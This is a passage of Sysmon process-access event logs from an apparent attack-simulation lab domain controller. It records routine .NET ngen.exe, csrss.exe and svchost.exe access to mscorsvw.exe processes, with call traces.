C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.872","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105C410D00}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.872\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105C410D00}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.872","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105C410D00}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.872\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105C410D00}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.872","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00105C410D00}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.919\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010D0DE0C00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.919","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010D0DE0C00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.919\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010D0DE0C00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.919","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010D0DE0C00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.919\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133C-5F25-0000-0010D0DE0C00}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.919","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133C-5F25-0000-0010D0DE0C00}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.950\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106B480D00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.950","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106B480D00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.950\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00106B480D00}\r\nTargetProcessId: 2880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.950","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-00106B480D00}","TargetProcessId":"2880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
